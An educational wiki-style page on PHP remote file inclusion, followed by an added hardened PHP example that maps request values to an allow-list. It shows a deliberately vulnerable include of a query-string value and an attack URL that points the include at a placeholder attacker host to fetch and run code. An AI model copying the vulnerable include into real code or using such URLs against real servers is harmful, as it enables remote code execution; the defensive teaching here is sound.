
File Inclusion/Remote File Inclusion

From NetSec

Remote file inclusion (RFI) refers to the inclusion of a file that is not located on the victim's server: the file name taken from the request is a URL, and PHP fetches the file over HTTP or FTP before executing it. Because PHP's allow_url_include setting has defaulted to Off since PHP 5.2, remote inclusion only works when an administrator has explicitly enabled it, and this form of the vulnerability is now rare. The same unvalidated include still allows local file inclusion, so the code below is vulnerable either way.

The URI of a vulnerable page might look like /include.php?file=howto.php, where the value of the file parameter is passed straight to include().

PHP for this may look like (the include line is the minimal form of what the text describes):

 <TITLE>Page Title</TITLE>
 <?php
 // The file name comes straight from the query string and is passed to include()
 include($_GET['file']);
 ?>

The above PHP code is vulnerable. Do not use this on your site!

An attacker that sees

 /include.php?file=howto.php

may change the URL so that the file parameter points at a file on a server they control, for example (placeholder host):

 /include.php?file=http://<attacker host>/include.txt

In this example, if include.txt contains PHP code written by the attacker, PHP fetches the file over HTTP and executes that code on the server side, with the privileges of the web server process.
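The following is an added example and not code from the NetSec wiki page: a hardened replacement for the include.php?file=... pattern shown above, with the vulnerable form kept in a comment for contrast. It assumes the includable pages live in a pages/ directory next to the script and that the only request parameter is file; both are assumptions for illustration. The request value is used only as a key into a fixed map, so nothing from the query string reaches include() directly, and the script refuses to run if allow_url_include is on.

```php
<?php
// Added example, not the wiki's own code. Assumed layout: ./pages/howto.php,
// ./pages/about.php; assumed request parameter: file.

// The vulnerable form, for contrast. With allow_url_include=On (which also
// requires allow_url_fopen=On) in php.ini, ?file=http://<attacker host>/include.txt
// makes PHP fetch and execute the attacker's code on the server.
//   include($_GET['file']);

// Defence in depth: allow_url_include is a PHP_INI_SYSTEM setting, so it cannot
// be changed with ini_set() here, but the script can refuse to run if it is on.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be Off in php.ini');
}

// Hardened form: the request value is only ever a key into this map.
$pages = [
    'howto' => 'howto.php',
    'about' => 'about.php',
];

$page = isset($_GET['file']) ? (string) $_GET['file'] : 'howto';

if (!array_key_exists($page, $pages)) {
    http_response_code(404);
    exit('Unknown page');
}

// Resolve the mapped file and confirm it really lives inside pages/.
// realpath() returns false for a missing file and strips any ../ segments.
$base = realpath(__DIR__ . '/pages');
$path = ($base === false) ? false : realpath($base . '/' . $pages[$page]);

if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(500);
    exit('Page misconfigured');
}

include $path;
```

To check a server's setting without reading php.ini, run `php -i | grep allow_url` on the command line or call ini_get('allow_url_include') from a script; note that allow_url_include is deprecated as of PHP 7.4, so new deployments should never need it on.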